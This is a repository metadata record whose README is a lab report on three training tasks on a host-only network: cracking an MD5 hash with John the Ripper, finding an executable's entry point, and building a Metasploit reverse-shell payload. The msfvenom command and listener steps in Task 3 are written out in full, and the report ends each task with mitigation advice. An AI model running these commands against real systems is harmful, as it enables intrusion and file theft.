{"id":29523916,"url":"https://github.com/codelassey/intermediate-level","last_synced_at":"2026-05-19T06:05:00.520Z","repository":{"id":304421021,"uuid":"1018745315","full_name":"codelassey/intermediate-level","owner":"codelassey","description":"Focused on cybersecurity techniques, including cracking a hashed password to unlock a VeraCrypt-encrypted file, analyzing an executable to find its entry point, and creating a reverse shell payload using Metasploit.","archived":false,"fork":false,"pushed_at":"2025-07-13T00:39:52.000Z","size":2537,"stargazers_count":0,"open_issues_count":0,"forks_count":0,"subscribers_count":0,"default_branch":"main","last_synced_at":"2025-07-13T02:34:20.816Z","etag":null,"topics":["john-the-ripper","linux","medusa","metasploit-framework","msfvenom","reverse-engineering","veracrypt","windows"],"latest_commit_sha":null,"homepage":"","language":null,"has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/codelassey.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null}},"created_at":"2025-07-13T00:15:34.000Z","updated_at":"2025-07-13T00:41:17.000Z","dependencies_parsed_at":"2025-07-13T02:44:47.341Z","dependency_job_id":null,"html_url":"https://github.com/codelassey/intermediate-level","commit_stats":null,"previous_names":["codelassey/intermediate-level"],"tags_count":null,"template":false,"template_full_name":null,"purl":"pkg:github/codelassey/intermediate-level","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/codelassey%2Fintermediate-level","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/codelassey%2Fintermediate-level/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/codelassey%2Fintermediate-level/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/codelassey%2Fintermediate-level/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/codelassey","download_url":"https://codeload.github.com/codelassey/intermediate-level/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/codelassey%2Fintermediate-level/sbom","scorecard":null,"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":33204085,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-05-18T09:27:30.708Z","status":"online","status_checked_at":"2026-05-19T02:00:06.763Z","response_time":58,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["john-the-ripper","linux","medusa","metasploit-framework","msfvenom","reverse-engineering","veracrypt","windows"],"created_at":"2025-07-16T18:08:56.433Z","updated_at":"2026-05-19T06:05:00.504Z","avatar_url":"https://github.com/codelassey.png","language":null,"funding_links":[],"categories":[],"sub_categories":[],"readme":"# Introduction\n\nThe intermediate level tasks focused on advanced cybersecurity\ntechniques, including cracking a hashed password to unlock a\nVeraCrypt-encrypted file, analyzing an executable to find its entry\npoint, and creating a reverse shell payload using Metasploit. These\ntasks were performed using a Kali Linux machine and Windows 10 on a\nhost-only network, with additional tools like John the Ripper, PE\nExplorer, and Metasploit.\n\n# Task Level: Intermediate\n\n| **S.NO** | **TITLE** |\n|----------|-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|\n| 1 | A file is encrypted using VeraCrypt (a disk encryption tool). The password to access the file is encrypted in a hash format and provided to you in the drive with the name `encoded.txt`. Decode the password and enter it in VeraCrypt to unlock the file and find the secret code in it. The VeraCrypt setup file will be provided to you. |\n| 2 | An executable file of VeraCrypt will be provided to you. Find the address of the entry point of the executable using the PE Explorer tool and provide the value as the answer in a screenshot. |\n| 3 | Create a payload using Metasploit and make a reverse shell connection from a Windows 10 machine in your virtual machine setup. |\n\n# Information About The Report\n\n- **Password Hash Cracking**: This technique involves recovering\n plaintext passwords from hashed formats using brute force or\n wordlist attacks. In Task 1, I cracked a password hash to unlock a\n VeraCrypt file, revealing the secret code.\n\n- **Executable File Analysis**: This process uses reverse engineering\n tools to inspect executable files for key attributes like the entry\n point. In Task 2, I analyzed the VeraCrypt executable to find its\n entry point using PE Explorer.\n\n- **Reverse Shell Creation**: This method establishes a remote\n connection from a target to an attacker's machine, allowing command\n execution. In Task 3, I created a Metasploit payload to gain a\n reverse shell from my Windows host, enabling directory navigation\n and file transfer.\n\n# Task 1: Decode the Password for the VeraCrypt-Encrypted File\n\n**Attack Name**: Password Hash Cracking\n\n**Severity**: High\n\n**Reason**: Cracking a hashed password can grant unauthorized access to\nencrypted files, potentially exposing sensitive data, making it a\ncritical security threat.\n\n**Steps Taken**\n\n1. Located the file encoded.txt on the provided drive, containing the hash 482c811da5d5b4bc6d497ffa98491e38.\n\n2. Identified the hash type as MD5 using its 32-character hexadecimal format.\n\n3. Used John the Ripper to crack the hash with the command: john --format=raw-md5 --wordlist=/usr/share/wordlists/rockyou.txt encoded.txt\n\n5. John returned the cracked password: **password123**.\n\n6. Opened VeraCrypt, mounted the encrypted file, and entered password123 to unlock it.\n\n\u003e ![SHOTS](SHOTS/media/image9.png)\n\n\u003e ![SHOTS](SHOTS/media/image10.png)\n\n\n7. Accessed the file's content and saw the secret code: **never giveup**.\n\n\u003e ![SHOT](SHOTS/media/image11.png)\n\n\n**Analysis**\n\n- The hash was successfully cracked. MD5 is a weak hashing algorithm vulnerable to wordlist attacks.\n\n- The password 'password123' was found in the rockyou.txt wordlist, indicating a weak password choice.\n\n- The secret code never giveup was retrieved, demonstrating the risk of weak passwords in encryption.\n\n**Impact**\n\n- Unauthorized access to encrypted files can lead to data breaches,\n exposing sensitive information.\n\n- Weak passwords and outdated hash algorithms increase the risk of\n successful attacks.\n\n**Mitigation**\n\n- Use strong, complex passphrases with mixed case, numbers, and\n symbols.\n\n- Employ stronger hash algorithms like bcrypt and Argon2 for password\n storage.\n\n- Regularly audit and update encryption tools and passwords.\n\n**Tools Used**\n\n- John the Ripper\n\n- VeraCrypt\n\n# Task 2: Find the Address of the Entry Point of the VeraCrypt Executable\n\n**Attack Name**: Executable File Analysis\n\n**Severity**: Medium\n\n**Reason**: Identifying the entry point of an executable can aid in\nreverse engineering or exploit development, posing a moderate risk if\nused maliciously to analyze or modify software behavior.\n\n**Steps Taken**\n\n1. Obtained the VeraCrypt executable file.\n\n2. Launched PE Explorer on my Windows 10 system.\n\n\u003e ![shot](SHOTS/media/image12.png)\n\n3. Opened VeraCrypt.exe in PE Explorer via File \\\u003e Open.\n\n\u003e ![shot](SHOTS/media/image13.png)\n\n4. Navigated to the Headers Info Viewer and located the Optional Header\n section.\n\n5. Identified the Address of Entry Point, recorded as 004237B0.\n\n\u003e ![shots](SHOTS/media/image14.png)\n\n**Analysis**\n\n- The Address of Entry Point (004237B0) is a Relative Virtual Address\n (RVA), indicating where the executable's code begins in memory.\n\n- This information could be used to analyze the program's behavior or\n develop exploits, though no malicious actions were performed here.\n\n**Impact**\n\n- Knowledge of the entry point can facilitate reverse engineering,\n potentially leading to vulnerabilities if the executable has flaws.\n\n- Unauthorized modification of the executable could compromise system\n security.\n\n**Mitigation**\n\n- Obfuscate executable code to hinder reverse engineering.\n\n- Use code signing to verify the integrity of executables.\n\n- Restrict access to sensitive executables and monitor for\n unauthorized analysis.\n\n**Tools Used**\n\n- PE Explorer\n\n---\n\n# Task 3: Create a Metasploit Payload and Establish a Reverse Shell\n\n**Attack Name**: Reverse Shell Exploitation\n\n**Severity**: Critical\n\n**Reason**: A reverse shell grants full control over a target system,\nenabling file access, command execution, and potential privilege\nescalation, posing a severe threat if exploited maliciously.\n\n**Steps Taken**\n\n1. On my Kali Linux machine (IP: 192.168.56.109), I ran: `msfvenom -p\n windows/meterpreter/reverse_tcp LHOST=192.168.56.109 LPORT=4444 -f\n exe -o bad.exe` to create a reverse shell payload.\n\n\u003e ![shot](SHOTS/media/image15.png)\n\n2. On my KALI vm, I dropped bad.exe to the E: drive (E:\\\\PAYLOAD) on the Windows 10 using a shared folder.\n\n3. In Kali, started Metasploit (msfconsole) and set up the listener:\n- use exploit/multi/handler\n- set PAYLOAD windows/meterpreter/reverse_tcp\n- set LHOST 192.168.56.109\n- set LPORT 4444\n- exploit\n\n\u003e ![shot](SHOTS/media/image16.png)\n\n4. On the Windows host, double-clicked bad.exe on the E: drive to\n execute it.\n\n5. Gained a Meterpreter session and ran commands:\n\n- `sysinfo` to confirm system details.\n\n- `getuid` to verify myself hahaha...\n\n- `ps` to list running processes on my Windows 10.\n\n- `cd C:\\\\` and `dir` to navigate and view directories like Users.\n\n- I downloaded a file from the windows machine unto the kali vm.\n\n\u003e ![shot](SHOTS/media/image17.png)\n\n\u003e ![shot](SHOTS/media/image18.png)\n\n\u003e ![shot](SHOTS/media/image19.png)\n\n\u003e ![shot](SHOTS/media/image20.png)\n\n\u003e ![shot](SHOTS/media/image21.png)\n\n\u003e ![shot](SHOTS/media/image22.png)\n\n\u003e ![shot](SHOTS/media/image23.png)\n\n\u003e ![shot](SHOTS/media/image24.png)\n\n6. Terminated the session by `kill` and with exit and deleted bad.exe\n from E:\\\\Downloads.\n\n**Analysis**\n\n- The reverse shell successfully connected to the Kali listener,\n allowing full control over the Windows host.\n\n- Navigation to the C: drive revealed standard directories, and file\n download demonstrated the payload's capabilities.\n\n**Impact**\n\n- A reverse shell can lead to complete system compromise, including\n data theft, malware deployment, or privilege escalation.\n\n- Unprotected systems are highly vulnerable to such attacks if\n payloads are executed.\n\n**Mitigation**\n\n- Enable and configure Windows Defender and Firewall to block\n suspicious executables.\n\n- Restrict user permissions to prevent unauthorized execution.\n\n- Avoid running untrusted files and use sandbox environments for\n testing.\n\n**Tools Used**\n\n- Metasploit Framework\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fcodelassey%2Fintermediate-level","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fcodelassey%2Fintermediate-level","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fcodelassey%2Fintermediate-level/lists"}